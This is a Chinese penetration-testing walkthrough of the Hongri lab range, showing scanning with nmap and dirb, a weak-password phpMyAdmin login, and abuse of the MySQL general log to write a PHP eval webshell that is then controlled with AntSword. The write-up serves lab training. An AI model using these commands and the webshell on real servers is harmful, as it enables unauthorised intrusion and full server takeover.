【渗透测试】-红日靶场-获取web服务器权限

拓扑图:

前置环境配置:

Win 7

默认密码:hongrisec@201

内网ip:192.168.52.143

打开虚拟网络编辑器

添加网络->VMent1->仅主机模式->子网ip:192.168.145.0

添加网卡:

虚拟机->设置-> 添加->网络适配器

保存,打开win 7并重启:

查看ip地址:

外网ip: Ip:192.168.145.129

内网ip: Ip:192.168.52.143

进入C:\phpstudy,启动

渗透测试:

方法一:phpadmin

打开kali,ip:192.168.145.128

存活主机探测

命令:nmap -sn 192.168.145.0/24

全端口扫描

命令:nmap -A -p 1-65535 192.168.145.129

80端口-> 开放 http服务

3306端口->开放 mysql服务

目录扫描

命令:dirb http://192.168.145.129

http://192.168.145.129/phpmyadmin/

登录验证:

192.168.145.129:80

泄露:

路径:C:/phpStudy/WWW

使用弱口令进行数据库连接:

root:root

http://192.168.145.129/phpmyadmin/

登录->sql。

第一步 查询日志 命令: show variables like '%general%';

发现日志写入系统关闭,需要打开。

命令: set global general_log='on';

开启成功。

在C:/phpStudy/WWW/2.php路径下写入一句话木马:

set global general_log_file = 'C:/phpStudy/WWW/2.php'

select '<?php @eval($_POST["cmd"]);?>'

验证:http://192.168.145.129/2.php

使用中国蚁剑连接成功。

拿到服务器主机权限。

相关推荐
坚持就完事了9 分钟前
Linux中的权限信息
linux·运维·服务器
星幻元宇VR9 分钟前
VR环保学习机|科技助力绿色教育新模式
大数据·科技·学习·安全·vr·虚拟现实
未知鱼12 分钟前
Python安全开发之简易目录扫描器(含详细注释)
开发语言·python·安全
殷紫川20 分钟前
告别手动部署噩梦:CI/CD 持续交付全链路实战
运维·架构·自动化运维
Jianghong Jian38 分钟前
Hashcat:强大的密码恢复与安全测试工具
测试工具·安全·密码学
顶点多余43 分钟前
进程间通信 --- 共享内存篇(通信速度最快)
linux·服务器·jvm
liulilittle1 小时前
LINUX RING BUFFER TUN/TAP 1
linux·服务器·网络·c++·信息与通信·通信
supersolon1 小时前
WSL2(Linux)升级docker
linux·运维·docker·wsl·升级
人工干智能1 小时前
用AI写Fusion 360脚本:个人版也能免费玩自动化
运维·人工智能·自动化·fusion
赛博云推-Twitter热门霸屏工具1 小时前
社交媒体自动化营销趋势分析:未来3年怎么玩(2026-2029)
运维·自动化·媒体